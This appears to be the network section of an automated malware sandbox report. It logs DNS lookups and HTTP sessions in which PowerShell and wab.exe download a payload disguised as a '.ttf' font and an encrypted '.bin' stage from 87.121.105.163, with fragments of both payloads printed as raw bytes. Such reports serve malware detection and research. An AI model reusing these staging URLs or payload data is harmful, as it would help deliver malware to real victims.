                                          TimestampSource PortDest PortSource IPDest IP
                                          Apr 24, 2024 11:57:58.010330915 CEST5673553192.168.11.201.1.1.1
                                          Apr 24, 2024 11:57:58.180705070 CEST53567351.1.1.1192.168.11.20
                                          Apr 24, 2024 11:58:18.892030001 CEST6341753192.168.11.201.1.1.1
                                          Apr 24, 2024 11:58:19.062972069 CEST53634171.1.1.1192.168.11.20
                                          Apr 24, 2024 11:58:31.668620110 CEST6214253192.168.11.201.1.1.1
                                          Apr 24, 2024 11:58:31.840389013 CEST53621421.1.1.1192.168.11.20
                                          Apr 24, 2024 11:58:38.355878115 CEST5553153192.168.11.201.1.1.1
                                          Apr 24, 2024 11:58:38.528505087 CEST53555311.1.1.1192.168.11.20
                                          Apr 24, 2024 11:58:46.588567972 CEST6009853192.168.11.201.1.1.1
                                          Apr 24, 2024 11:58:46.761590958 CEST53600981.1.1.1192.168.11.20
                                          Apr 24, 2024 11:59:01.522861958 CEST5667453192.168.11.201.1.1.1
                                          Apr 24, 2024 11:59:02.088423014 CEST53566741.1.1.1192.168.11.20
                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                          Apr 24, 2024 11:57:58.010330915 CEST192.168.11.201.1.1.10x897cStandard query (0)www.tyaer.comA (IP address)IN (0x0001)false
                                          Apr 24, 2024 11:58:18.892030001 CEST192.168.11.201.1.1.10xfb3Standard query (0)www.oyoing.comA (IP address)IN (0x0001)false
                                          Apr 24, 2024 11:58:31.668620110 CEST192.168.11.201.1.1.10x40b6Standard query (0)www.oyoing.comA (IP address)IN (0x0001)false
                                          Apr 24, 2024 11:58:38.355878115 CEST192.168.11.201.1.1.10xd1bfStandard query (0)www.megabet303.lolA (IP address)IN (0x0001)false
                                          Apr 24, 2024 11:58:46.588567972 CEST192.168.11.201.1.1.10x1d98Standard query (0)www.theplays.shopA (IP address)IN (0x0001)false
                                          Apr 24, 2024 11:59:01.522861958 CEST192.168.11.201.1.1.10x36bfStandard query (0)www.fleksibox.storeA (IP address)IN (0x0001)false
                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                          Apr 24, 2024 11:57:58.180705070 CEST1.1.1.1192.168.11.200x897cNo error (0)www.tyaer.com47.91.88.207A (IP address)IN (0x0001)false
                                          Apr 24, 2024 11:58:19.062972069 CEST1.1.1.1192.168.11.200xfb3No error (0)www.oyoing.com127.0.0.1A (IP address)IN (0x0001)false
                                          Apr 24, 2024 11:58:31.840389013 CEST1.1.1.1192.168.11.200x40b6No error (0)www.oyoing.com127.0.0.1A (IP address)IN (0x0001)false
                                          Apr 24, 2024 11:58:38.528505087 CEST1.1.1.1192.168.11.200xd1bfName error (3)www.megabet303.lolnonenoneA (IP address)IN (0x0001)false
                                          Apr 24, 2024 11:58:46.761590958 CEST1.1.1.1192.168.11.200x1d98No error (0)www.theplays.shop172.67.152.117A (IP address)IN (0x0001)false
                                          Apr 24, 2024 11:58:46.761590958 CEST1.1.1.1192.168.11.200x1d98No error (0)www.theplays.shop104.21.74.5A (IP address)IN (0x0001)false
                                          Apr 24, 2024 11:59:02.088423014 CEST1.1.1.1192.168.11.200x36bfNo error (0)www.fleksibox.store45.130.41.4A (IP address)IN (0x0001)false
                                          • 87.121.105.163
                                          • www.tyaer.com
                                          • www.theplays.shop
                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          0192.168.11.205031487.121.105.163803124C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          TimestampBytes transferredDirectionData
                                          Apr 24, 2024 11:56:53.722626925 CEST170OUTGET /Licences.ttf HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                          Host: 87.121.105.163
                                          Connection: Keep-Alive
                                          Apr 24, 2024 11:56:54.028836966 CEST1289INHTTP/1.1 200 OK
                                          Date: Wed, 24 Apr 2024 09:56:53 GMT
                                          Server: Apache/2.4.41 (Ubuntu)
                                          Last-Modified: Wed, 17 Apr 2024 13:54:21 GMT
                                          ETag: "69ca8-6164b31047d40"
                                          Accept-Ranges: bytes
                                          Content-Length: 433320
                                          Keep-Alive: timeout=5, max=100
                                          Connection: Keep-Alive
                                          Content-Type: font/ttf
                                          Data Raw: 63 51 47 62 36 77 4b 41 4c 37 73 55 58 67 38 41 36 77 49 31 41 6e 45 42 6d 77 4e 63 4a 41 52 78 41 5a 74 78 41 5a 75 35 51 33 39 46 41 6e 45 42 6d 33 45 42 6d 34 48 42 2b 33 2b 4d 47 33 45 42 6d 2b 73 43 78 58 36 42 38 54 37 2f 30 52 31 78 41 5a 74 78 41 5a 76 72 41 71 42 72 63 51 47 62 75 67 51 6e 54 52 6c 78 41 5a 76 72 41 76 53 43 36 77 4c 46 6f 58 45 42 6d 7a 48 4b 36 77 49 64 7a 48 45 42 6d 34 6b 55 43 33 45 42 6d 2b 73 43 68 6c 7a 52 34 75 73 43 54 7a 7a 72 41 70 74 66 67 38 45 45 63 51 47 62 36 77 49 54 63 34 48 35 72 42 51 74 42 48 7a 4b 36 77 49 79 74 48 45 42 6d 34 74 45 4a 41 54 72 41 70 6f 7a 63 51 47 62 69 63 50 72 41 6e 59 4f 63 51 47 62 67 63 4d 7a 76 6d 38 43 36 77 49 6f 4e 6e 45 42 6d 37 71 6c 68 53 6b 64 36 77 4b 35 70 2b 73 43 47 47 79 42 36 6e 56 74 62 2b 6e 72 41 76 4a 70 63 51 47 62 67 66 49 77 47 4c 6f 7a 63 51 47 62 63 51 47 62 36 77 4c 66 42 48 45 42 6d 33 45 42 6d 2b 73 43 63 41 61 4c 44 42 44 72 41 68 77 78 36 77 4a 53 5a 6f 6b 4d 45 2b 73 43 62 79 44 72 41 72 52 68 51 6e 45 42 6d 2b 73 43 59 4e 53 42 2b 75 79 51 42 41 42 31 30 2b 73 43 67 4a 62 72 41 6b 36 4c 69 56 77 6b 44 4f 73 43 70 47 4c 72 41 6c 53 4c 67 65 30 41 41 77 41 41 36 77 4b 79 64 58 45 42 6d 34 74 55 4a 41 6a 72 41 6a 63 54 63 51 47 62 69 33 77 6b 42 4f 73 43 4c 4d 7a 72 41 71 71 62 69 65 76 72 41 6e 37 73 36 77 4b 31 4b 34 48 44 6e 41 41 41 41 4f 73 43 70 6d 70 78 41 5a 74 54 63 51 47 62 63 51 47 62 61 6b 42 78 41 5a 74 78 41 5a 75 4a 36 33 45 42 6d 2b 73 43 75 79 76 48 67 77 41 42 41 41 41 41 67 44 38 45 36 77 4b 64 71 6e 45 42 6d 34 48 44 41 41 45 41 41 48 45 42 6d 33 45 42 6d 31 4e 78 41 5a 76 72 41 6b 64 48 69 65 76 72 41 6c 2b 67 36 77 4c 63 2f 59 6d 37 42 41 45 41 41 48 45 42 6d 2b 73 43 65 62 4b 42 77 77 51 42 41 41 44 72 41 6d 57 6a 36 77 4c 62 55 31 4e 78 41 5a 74 78 41 5a 74 71 2f 33 45 42 6d 33 45 42 6d 34 50 43 42 58 45 42 6d 33 45 42 6d 7a 48 32 36 77 4b 32 58 6e 45 42 6d 7a 48 4a 36 77 4a 39 48 33 45 42 6d 34 73 61 36 77 4c 78 4a 75 73 43 75 4c 31 42 63 51 47 62 63 51 47 62 4f 52 77 4b 64 66 54 72 41 76 6e 4f 36 77 4b 73 6c 45 5a 78 41 5a 76 72 41 71 70 4c 67 48 77 4b 2b 37 68 31 33 65 73 43 7a 38 72 72 41 6f 64 35 69 30 51 4b 2f 48 45 42 6d 33 45 42 6d 79 6e 77 36 77 4a 68 43 65 73 43 4c 4c 2f 2f 30 75 73 43 7a 76 70 78 41 5a 75 36 37 4a 41 45 41 48 45 42 6d 2b 73 43 73 35 6f 78 77 4f 73 43 7a 33 6e 72 41 76 56 58 69 33 77 6b 44 4f 73 43 54 31 4e 78 41 5a 75 42 4e 41 63 30 32 4a 44 4b 63 51 47 62 36 77 4a 59 39 6f 50 41 42 48 45 42 6d 33 45 42 6d 7a 6e 51 64 65 58 72 41 72 45 6d 63 51 47 62 69 66 74 78 41 5a 76 72 41 72 78 30 2f 39 64 78 41 5a 76 72 41 69 7a 54 55 75 46 4b 38 2f 62 67 57 30 50 52 55 65 56 5a 69 76 69 50 4c 5a 74 5a 5a 74 70 48 54 6b 78 4c 32 75 50 57 43 46 31 5a 5a 6a 38 53 64 35 6e 6a 77 46 50 6c 57 57 46 52 64 66 4c 74 59 65 41 33 74 74 4f 6f 43 4c 55 78 55 68 53 4a 42 42 45 4c 45 56 38 31 42 62 41 43 45 53 4f 50 66 66 6f 30 38 35 79 64 79 67 68 39 61 49 36 31 72 4a 33 4b 2b 69 78 44 53 56 4c 68 55 66 4c 49 57 65 54 48
                                          Data Ascii: cQGb6wKAL7sUXg8A6wI1AnEBmwNcJARxAZtxAZu5Q39FAnEBm3EBm4HB+3+MG3EBm+sCxX6B8T7/0R1xAZtxAZvrAqBrcQGbugQnTRlxAZvrAvSC6wLFoXEBmzHK6wIdzHEBm4kUC3EBm+sChlzR4usCTzzrAptfg8EEcQGb6wITc4H5rBQtBHzK6wIytHEBm4tEJATrApozcQGbicPrAnYOcQGbgcMzvm8C6wIoNnEBm7qlhSkd6wK5p+sCGGyB6nVtb+nrAvJpcQGbgfIwGLozcQGbcQGb6wLfBHEBm3EBm+sCcAaLDBDrAhwx6wJSZokME+sCbyDrArRhQnEBm+sCYNSB+uyQBAB10+sCgJbrAk6LiVwkDOsCpGLrAlSLge0AAwAA6wKydXEBm4tUJAjrAjcTcQGbi3wkBOsCLMzrAqqbievrAn7s6wK1K4HDnAAAAOsCpmpxAZtTcQGbcQGbakBxAZtxAZuJ63EBm+sCuyvHgwABAAAAgD8E6wKdqnEBm4HDAAEAAHEBm3EBm1NxAZvrAkdHievrAl+g6wLc/Ym7BAEAAHEBm+sCebKBwwQBAADrAmWj6wLbU1NxAZtxAZtq/3EBm3EBm4PCBXEBm3EBmzH26wK2XnEBmzHJ6wJ9H3EBm4sa6wLxJusCuL1BcQGbcQGbORwKdfTrAvnO6wKslEZxAZvrAqpLgHwK+7h13esCz8rrAod5i0QK/HEBm3EBmynw6wJhCesCLL//0usCzvpxAZu67JAEAHEBm+sCs5oxwOsCz3nrAvVXi3wkDOsCT1NxAZuBNAc02JDKcQGb6wJY9oPABHEBm3EBmznQdeXrArEmcQGbiftxAZvrArx0/9dxAZvrAizTUuFK8/bgW0PRUeVZiviPLZtZZtpHTkxL2uPWCF1ZZj8Sd5njwFPlWWFRdfLtYeA3ttOoCLUxUhSJBBELEV81BbACESOPffo085ydygh9aI61rJ3K+ixDSVLhUfLIWeTH
                                          Apr 24, 2024 11:56:54.028928041 CEST1289INData Raw: 4e 49 6e 79 31 67 31 5a 31 4d 63 30 68 56 77 43 4e 56 45 74 4e 44 58 59 6b 48 56 61 71 63 38 6f 74 54 65 59 31 30 4c 42 45 51 30 45 6e 48 6f 73 74 53 38 43 55 75 64 33 46 44 59 31 49 52 74 33 79 74 6d 51 79 76 4e 64 70 38 67 30 32 4b 73 57 63 55
                                          Data Ascii: NIny1g1Z1Mc0hVwCNVEtNDXYkHVaqc8otTeY10LBEQ0EnHostS8CUud3FDY1IRt3ytmQyvNdp8g02KsWcUgRfwPakMoXm/ObDD/2PfJlK0ux75LKNIbkP2FZPf022JA0JcSH8bnvkso01xWzyydvrLEZqQINCRlPTNmQyr1F3Ms02PZP/uBlmbAuePWy3JDy0VHVjsIdNCPzkZTKDBkUCrtd9Ms02BExFypGx1xAKBGEMDCbMNj
                                          Apr 24, 2024 11:56:54.029012918 CEST1289INData Raw: 55 78 2b 6f 52 55 4a 62 72 34 52 4d 51 42 4c 7a 6e 57 44 41 78 74 78 59 32 66 66 65 50 39 72 45 54 30 50 72 39 67 71 74 54 65 63 4c 6f 69 55 45 53 55 37 2b 4f 58 43 74 52 2b 73 39 35 76 5a 47 63 30 2b 50 52 50 74 69 76 55 45 4e 31 39 38 54 57 4c
                                          Data Ascii: Ux+oRUJbr4RMQBLznWDAxtxY2ffeP9rET0Pr9gqtTecLoiUESU7+OXCtR+s95vZGc0+PRPtivUEN198TWLXa/O9z5F6frn2qv1cXxWZvQsV9SyOTJx0g6BCgciU16OHwHIyXvNTAY9AY9r1NS+4vZWepBp9nahRd8MzRakQTMK0VDmT7gEAZ75ee6nHqHtrbI8QnFApnvS1PYloCkvPxkm0D4eoEmxZZy97KkSajPZbD9Ld/vIl
                                          Apr 24, 2024 11:56:54.029027939 CEST1289INData Raw: 6a 78 4e 63 30 53 44 6a 30 6a 4a 79 6b 34 31 48 74 35 33 43 55 41 4e 78 39 68 4a 58 42 6f 2b 2f 5a 32 76 79 45 71 64 74 6b 30 6f 36 4e 56 50 30 62 6f 65 43 36 58 74 2b 2b 68 6f 6c 6e 6f 49 65 42 75 6c 4c 41 4c 79 4a 75 4e 4b 5a 31 59 69 56 6c 68
                                          Data Ascii: jxNc0SDj0jJyk41Ht53CUANx9hJXBo+/Z2vyEqdtk0o6NVP0boeC6Xt++holnoIeBulLALyJuNKZ1YiVlht0CHXUvFtLIqK1lROPLzD0vdCrGTOosMQ9fRm1cMEuvGAnEK2ngI23KMSvjhDBB1pHedUKdRsAdLSajVmTTYn0cnr5TKb1x+k7+VjHAUVTeD3L+vzjRRFYo12JAGuin5IBaNILwqiwfoihHdSHGQRRByCHnToY7bm
                                          Apr 24, 2024 11:56:54.029040098 CEST1289INData Raw: 30 32 4a 44 4b 4e 48 66 65 52 30 79 72 4c 4b 4e 36 61 47 34 33 73 65 49 4f 59 49 39 77 4d 48 74 35 34 4c 4e 72 66 31 76 32 78 66 50 75 6b 4d 6f 30 32 4a 44 4b 4e 47 66 78 7a 4f 36 2f 75 6c 42 70 30 38 78 54 50 36 43 50 76 58 65 73 70 7a 53 78 45
                                          Data Ascii: 02JDKNHfeR0yrLKN6aG43seIOYI9wMHt54LNrf1v2xfPukMo02JDKNGfxzO6/ulBp08xTP6CPvXespzSxEs7aiiUe9Ol9M3y5kQmt5p2Q2Opl+D7Zr4uikQ7aF2NnqXax8xElBv0oy7Uv9kf58RnFcLkGLcGSnsI6TRTRDtmnWLgxM5WeHAknJuTiKWtZvO4tuhoQtdy0kxlAdEsY/FNrbD+fyiP7kMo02JDKNEgV9REEosqBbr
                                          Apr 24, 2024 11:56:54.029051065 CEST1289INData Raw: 79 76 6a 47 6c 4d 6c 62 50 72 51 4a 70 69 56 35 59 52 47 59 4d 4a 6b 47 2b 6a 59 4e 71 52 4a 35 61 63 39 39 4c 64 6c 49 44 72 6c 79 4f 39 69 45 37 6a 54 59 6b 4d 6f 30 32 4a 42 65 74 69 47 4c 74 7a 4b 4e 62 50 56 6b 57 6b 73 54 6e 39 48 4c 45 41
                                          Data Ascii: yvjGlMlbPrQJpiV5YRGYMJkG+jYNqRJ5ac99LdlIDrlyO9iE7jTYkMo02JBetiGLtzKNbPVkWksTn9HLEAkSnEnw4MBy0v9Z6AFBDiMg3RtVnCa983iQxufl0xEUZkQZKD3aDU7+rZmIu1ZcdQDn3gOMamwzAd6VSn/PVagBLup9ZpUfpjdkOhfuLS19PkxLANuOqBt/I+eyUuFDkMMfpRSdz8iZj0/Dq6VZUyRAX9tLxw05Iuh
                                          Apr 24, 2024 11:56:54.029062986 CEST1289INData Raw: 7a 2f 5a 2f 55 70 45 72 6e 61 43 47 51 32 39 58 62 44 49 4e 4e 68 63 50 48 4e 71 57 35 51 6b 4f 76 59 2b 79 58 61 5a 74 4b 5a 61 37 65 35 6b 53 71 42 30 2b 30 53 33 76 49 6a 34 67 6c 4d 4b 6c 42 74 58 38 2b 6d 77 63 6f 65 39 78 42 41 42 49 4d 2b
                                          Data Ascii: z/Z/UpErnaCGQ29XbDINNhcPHNqW5QkOvY+yXaZtKZa7e5kSqB0+0S3vIj4glMKlBtX8+mwcoe9xBABIM+m044uh/aKfEvCB/BsQllmX6D0UkvC+UW5e1lWECmMeJ2oUXfLA0X2T+2uk8XhMRm+eW4sp6w2gZBMwLZitSNTixzAz0tJpNxUNNifRyOjkMpq7UM/XoKfyu1wkMo02JDKNHbjdHpDPO7vqQqPVGJrQWq4Hz4csa2k
                                          Apr 24, 2024 11:56:54.029073954 CEST1289INData Raw: 65 48 77 33 47 46 5a 70 37 62 74 53 75 49 50 32 57 5a 45 53 47 4d 79 6a 69 55 74 54 4e 68 2f 59 4d 70 77 6c 61 39 4f 70 6e 51 71 65 46 57 74 53 53 43 69 70 64 58 56 41 61 6b 50 6f 49 47 6a 4b 2b 43 37 6a 37 49 66 4d 45 72 35 33 46 58 33 68 52 4b
                                          Data Ascii: eHw3GFZp7btSuIP2WZESGMyjiUtTNh/YMpwla9OpnQqeFWtSSCipdXVAakPoIGjK+C7j7IfMEr53FX3hRKjfixGMpO04MZT3bakMq9IMBBsZqSyjTXkdF82JDKNNiQyqqGD6bO/tSjTATDcUOEjDW1G4OP8coROQkRFKC1K56u0RsRCbSjEI29y5m6d8fGuKm2B2IF3daJU2nqI+7jol6E1s8bM9Yqk1h5YJFctbAyzVmk7qUle
                                          Apr 24, 2024 11:56:54.029084921 CEST1289INData Raw: 37 76 32 2b 6e 6d 62 55 70 52 6b 4f 69 4a 78 6e 62 5a 64 2b 48 47 58 75 61 2f 77 36 70 65 76 75 41 74 71 49 41 69 2b 79 57 77 49 63 54 54 39 6b 54 4f 74 64 6d 79 2f 72 31 55 65 37 42 57 57 58 4d 64 49 75 41 6b 37 31 46 64 4d 73 30 32 42 6b 78 4f
                                          Data Ascii: 7v2+nmbUpRkOiJxnbZd+HGXua/w6pevuAtqIAi+yWwIcTT9kTOtdmy/r1Ue7BWWXMdIuAk71FdMs02BkxO9mGZDTYkMo02JBcPFFGIiteLPmFBmuuO/OZyBSLwnBIgjIXtSo502KFETjFlGRKvdL6matzYU0f1r5UPVdGhrhssHULghtX0NmQyvhVBb4RjGvJE+wuXx3Cuz1OsOhqlORUio90dyZP1MZ0AkHzE7Uu+0byahE8y3
                                          Apr 24, 2024 11:56:54.029095888 CEST1289INData Raw: 44 44 6f 66 74 6e 79 54 36 72 38 35 30 36 33 4b 45 66 4a 7a 31 47 55 2b 51 54 67 51 73 6a 42 67 35 52 43 30 6f 4a 6b 4a 51 51 77 62 56 78 7a 5a 6b 4d 70 6a 5a 77 35 63 69 36 38 52 4a 56 67 50 44 6f 53 31 4e 30 59 4f 51 53 73 52 4a 57 67 68 4f 76
                                          Data Ascii: DDoftnyT6r85063KEfJz1GU+QTgQsjBg5RC0oJkJQQwbVxzZkMpjZw5ci68RJVgPDoS1N0YOQSsRJWghOv9iRBksNeYNTuyilfPj6/9+Os/p5a91EzjXWe2+Py6QyjtVuU402M6sDQjPQ2zdV4k43JDKNBR01sEu1iVqUGDtqGECB81VulpBomJIv5WImI4vVtJsWWL98Um6S8Zet4wnWXpnLCHOS/YJq+DJUYoqvA/YkQELYmu
                                          Apr 24, 2024 11:56:54.335503101 CEST1289INData Raw: 63 6e 79 32 61 70 70 32 69 39 6e 65 4d 76 46 66 38 35 6f 38 71 2b 33 65 50 54 31 49 31 64 4c 47 50 77 78 42 71 50 32 45 66 34 51 75 39 44 38 37 59 73 72 6e 37 59 66 35 45 76 48 4f 53 69 42 31 6c 6c 54 30 55 41 59 61 6b 76 48 78 4d 45 44 4c 46 6c
                                          Data Ascii: cny2app2i9neMvFf85o8q+3ePT1I1dLGPwxBqP2Ef4Qu9D87Ysrn7Yf5EvHOSiB1llT0UAYakvHxMEDLFl7tmFdGUM3QFFX7wN0OI1jNv+KMldpg3HlwMPC//FU8ykNBpRVjL7SH6xZLjOWF7MRRW9ZvO6ICvfyZ2Pb8b/FESHWKT7atRt4dxcrGdHzAjAhTg1dNglgfbnZ5zHTWQIsm7Hg5Uxy7kcmCUVK/SWd2agEqDHmHUTN


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          1192.168.11.205031587.121.105.163807348C:\Program Files (x86)\Windows Mail\wab.exe
                                          TimestampBytes transferredDirectionData
                                          Apr 24, 2024 11:57:20.866197109 CEST176OUTGET /vhhJQWfiJN142.bin HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                          Host: 87.121.105.163
                                          Cache-Control: no-cache
                                          Apr 24, 2024 11:57:21.172322989 CEST1289INHTTP/1.1 200 OK
                                          Date: Wed, 24 Apr 2024 09:57:21 GMT
                                          Server: Apache/2.4.41 (Ubuntu)
                                          Last-Modified: Wed, 17 Apr 2024 13:51:13 GMT
                                          ETag: "43440-6164b25cfd640"
                                          Accept-Ranges: bytes
                                          Content-Length: 275520
                                          Content-Type: application/octet-stream
                                          Data Raw: 6a 10 b2 24 e8 04 70 16 95 79 50 4b 9e 06 53 38 e1 58 f9 a1 61 ab 6c 8c 7e 7d e6 5f 49 2d 17 2a 45 fa b5 1b 34 b4 83 28 72 e0 88 9e 03 62 69 22 23 70 d2 3b eb b4 5a 0a 63 90 5e 00 5b 7f 7f 50 a7 de a7 92 7c 05 44 be 3f 82 26 82 dc 96 31 74 dd fc c9 4b 37 02 d2 41 96 84 92 5f b1 96 25 96 9c 63 23 76 e5 fc 81 29 cc 06 ab b2 ac ab 6e 4e 42 75 39 3d 9b 5b d6 92 cd 3e e0 1b de c2 98 81 38 db 9c 66 0a de 76 5d f7 a9 b2 a8 28 ad 25 9f 57 89 ab 82 87 fb 79 99 87 37 8d 55 7b 6f 35 1b 3f 0d 7d 7e 4a 7a 93 3f 8c 9b a4 47 d1 bd 15 ac 20 37 91 6d 1e e6 fc 99 35 c2 2f 56 6b 73 50 aa 1b ec e9 38 b4 28 fd 02 a8 d3 27 5e 71 47 ae 06 ef d0 3a 05 8b 66 b2 7f 77 a4 e8 dd 9f 7d 81 8c 89 06 fe af 1c 39 42 60 b5 a4 a8 30 b2 d8 27 05 b0 d9 6f 40 c4 b0 c6 e0 cb ca 76 e3 b6 b7 b2 38 a7 21 a9 56 af aa f9 32 49 26 fc 8b e5 68 8d a1 05 46 78 9c 9a 2d 25 3f a5 88 92 0e 07 c6 93 2b 06 fe 11 e1 7d 6a 9a 94 95 b2 5c da db 3a b1 8c 80 47 8e ed 5a 71 4d 3e e9 54 a5 3b e4 78 51 7e 6d 7e 0f 70 ee 62 18 17 69 2c b7 58 9f eb 1f 45 0f b8 23 db 95 dc 88 c9 19 11 af b1 e5 ec 09 9c 6d e6 dc ab 5c 50 b3 3b d7 b7 c0 a5 f1 be bc b3 f2 e7 32 af 46 18 60 d9 9a 98 43 bb dd de 02 c3 5b 0e 1d d3 3c b8 be 8d 94 03 1b 75 52 1b 6a b1 22 2d 46 25 71 f9 df f3 1d 4d 04 b7 6a a4 6a 29 f5 79 e6 ac ca 2a 48 45 3d ed 2c 29 c9 73 22 4c 3f 7f cd 4f db eb 43 b5 3a ee c7 b7 d5 e3 67 09 9c 2b 08 ef 01 88 49 88 17 6a a0 8a 30 32 21 84 09 15 9f 69 a9 bf 0b e8 47 d8 c2 84 92 97 98 4e 72 6f c7 5b 4a b4 3d 9a 05 8a 8c 20 7a a1 df 50 1f cf ad da 2a 38 d2 c0 55 76 28 48 ed b7 f6 d1 02 b6 e0 e3 63 44 f9 0f fc d3 03 33 68 57 d4 1c c8 36 3f 74 2b 96 89 5f 84 db 44 35 1e 9f f1 87 46 40 87 4d 33 06 03 6b c7 d0 ab 7c 26 b4 60 c3 59 02 46 99 d2 98 da 06 1e db 9e 0f 28 7a 1d 81 c6 b0 9e 0d 3a cb 75 9a d7 38 96 c1 4a 3e c9 eb 4a 40 b4 b0 d0 1f 16 dc ce 96 f0 e1 ba d9 87 aa 03 1f b6 d7 85 e9 a6 3b bd ff 8c 6c ab 01 1e af 8a 4c 59 14 98 71 1f 12 e5 2d 96 7e 5f 1c 9e ed 94 ce 0c 56 de ef cd 1d ea 15 99 5f 0d bc e9 3a 45 cc e0 72 49 a0 59 35 c8 27 ff 28 7c e3 07 b2 8c 80 0d 66 f0 be 2e 5c 06 b6 8b bc 19 a3 ed 12 a1 51 c7 ca 3b 91 93 0e 19 fe 9e ab 19 a5 7e 24 02 c0 25 b7 3e c9 93 b7 5d e2 3b 8d db cd b7 10 ab ff 24 57 55 15 43 2d 90 25 4e 31 03 6e 69 c9 ac 27 08 36 0d 83 29 45 4d 50 fa 58 85 15 59 a0 91 9b 93 2e 97 02 4f 06 fd 90 3b 6d f9 a4 4d 87 66 b1 44 6d 1d b0 aa ce 86 81 88 0b 99 0e b9 55 7a a2 18 f4 f9 89 75 38 6f 2b b3 40 84 1d 5c 4a 6a bd d3 af 4b e7 be 5e 50 9c fd 10 e2 8a ec 6c 07 2f d0 dd a4 d3 70 a0 fa 16 32 2b cb b8 e3 41 3f 3e 8a d7 fb 5a 9b 39 5b d0 60 30 c1 ed 42 a4 30 2c a1 7a 86 d0 eb 6d a6 5c 2f b8 c5 34 68 f3 b1 6b 75 9f 63 48 d3 98 ab 49 25 9b 7d 01 de fb d8 e6 22 81 b3 1d 50 94 cd 33 97 49 a6 67 2f ff 47 83 18 c6 a6 94 36 21 8d 0f 52 2a ad 3d 58 86 6b 41 6e f4 5d 9e d7 21 5c 2f 24 ab fb 0f d6 9a 64 46 5c 6f 3d 11 6b ee 88 bb 34 9e 37 73 37 b1 05 30 a7 d3 85 dd 2c 97 80 43 e4 3b 24 59 95 6f 98 6f 25 42 42 82 b1 7b 95 5e 3a 88 dd a9 d6 92 30 36 24 41 88 a7 c1 e8 f3 1e 91 ba cd f9 e1 98 2f f2 ae 1a ed 44 05 30 12 0d 47 6a 4e b5 f0 fb 5a 58 f9 0e 4a fc 28 51 8a 03 0d 8f c4 fe 6b eb ad 30 97 39 fc d7 84 b8 c6 a7 d4 70 04 af fd a7
                                          Data Ascii: j$pyPKS8Xal~}_I-*E4(rbi"#p;Zc^[P|D?&1tK7A_%c#v)nNBu9=[>8fv](%Wy7U{o5?}~Jz?G 7m5/VksP8('^qG:fw}9B`0'o@v8!V2I&hFx-%?+}j\:GZqM>T;xQ~m~pbi,XE#m\P;2F`C[<uRj"-F%qMjj)y*HE=,)s"L?OC:g+Ij02!iGNro[J= zP*8Uv(HcD3hW6?t+_D5F@M3k|&`YF(z:u8J>J@;lLYq-~_V_:ErIY5'(|f.\Q;~$%>];$WUC-%N1ni'6)EMPXY.O;mMfDmUzu8o+@\JjK^Pl/p2+A?>Z9[`0B0,zm\/4hkucHI%}"P3Ig/G6!R*=XkAn]!\/$dF\o=k47s70,C;$Yoo%BB{^:06$A/D0GjNZXJ(Qk09p
                                          Apr 24, 2024 11:57:21.172399044 CEST1289INData Raw: e2 a8 09 fe 61 40 4b b7 4a 91 be 48 74 3f cb 54 2b cf e0 96 8b e9 22 17 98 be f2 2b e3 a4 4c df ef 06 50 52 5e 94 4d 27 17 d8 39 3e ae 52 ff 1f fd e4 76 1c 16 97 ce 70 64 fc ea bd 99 65 4c b8 a6 39 d9 6e ef a4 5e fe da 38 70 b0 eb 59 32 0e 7f 04
                                          Data Ascii: a@KJHt?T+"+LPR^M'9>RvpdeL9n^8pY2|cpE_By+8?2yW_Mq l<0-N%M.V9kE92IZrGmQDlb_0F2jlym<\'Enp)XLA%jy.6nQP0
                                          Apr 24, 2024 11:57:21.172457933 CEST1289INData Raw: 4a 40 b4 b0 d0 1f 16 dc ce 96 f0 e1 ba d9 87 aa 03 1f b6 d7 85 e9 a6 3b bd ff 8c 6c ab 01 1e af 8a 4c 59 14 98 71 1f 12 e5 2d 96 7e 5f 1c 9e ed 94 ce 0c 56 de ef cd 1d ea 15 99 5f 0d bc e9 3a 45 cc e0 72 49 a0 59 35 c8 27 ff 28 7c e3 07 b2 8c 80
                                          Data Ascii: J@;lLYq-~_V_:ErIY5'(|f.\Q;~$%>];$WUC-%N1ni'6)EMPXY.O;mMfDmUzu8o+@\JjK^Pl/p2+A?>
                                          Apr 24, 2024 11:57:21.172513008 CEST1289INData Raw: 3e fa 8b f2 f5 94 1e eb e6 5a ad 36 1a 01 5b 74 4b 2d 1f 1b 6a 08 e6 51 ac f2 ca 67 95 f2 46 8c 4d 58 f5 08 30 eb f1 93 11 c2 2f 56 6b 73 50 aa 62 ed e0 98 89 48 9a f1 95 b3 40 ad 4c 27 c9 f5 f5 76 92 f6 b1 06 d5 8c 6d 02 42 2e a3 1d e6 7f 93 a0
                                          Data Ascii: >Z6[tK-jQgFMX0/VksPbH@L'vmB.U\ Y%X@o@v8u2I&hGs!?+}zX:WZsM>T;xQ~k~pbilXE#Hm\@;2F`C[
                                          Apr 24, 2024 11:57:21.172568083 CEST1289INData Raw: 54 fc 78 f2 1b c7 f6 13 57 7d 14 53 5a 8d 46 53 32 0f 82 4f 73 0f 1d 7b cc b1 58 9b 8f 19 41 78 1f 70 31 2b 75 f1 f3 27 e0 fd bc 42 4f 91 d3 d1 37 d0 0d 2f 00 27 13 85 6e bb 55 bf f7 ff 3a af 40 7d 7c 93 fc c2 bd 14 13 5e c0 b7 43 83 3a 37 ba 8b
                                          Data Ascii: TxW}SZFS2Os{XAxp1+u'BO7/'nU:@}|^C:7Tqi(qu,}MQKnf>u%H<@> ;b_yT8j|ZRU<U{o0Cmzsb.$:j:+5doWIY(E)In
                                          Apr 24, 2024 11:57:21.172622919 CEST1289INData Raw: 9e ba 72 b8 fc 62 5e 2c 19 af 5c 6c ba 4c 27 12 0d 3b b3 24 b5 9a fb d7 dd 15 f0 b5 03 78 ae 3f db f6 70 3b 73 ee b7 52 cf 68 69 14 5b 94 b8 c6 24 10 64 8d 2a ed 5a 1d 57 84 b7 61 f8 74 b1 ad f2 49 25 ac fe 31 50 a0 0d 21 7e 94 ea e0 9e dd 66 87
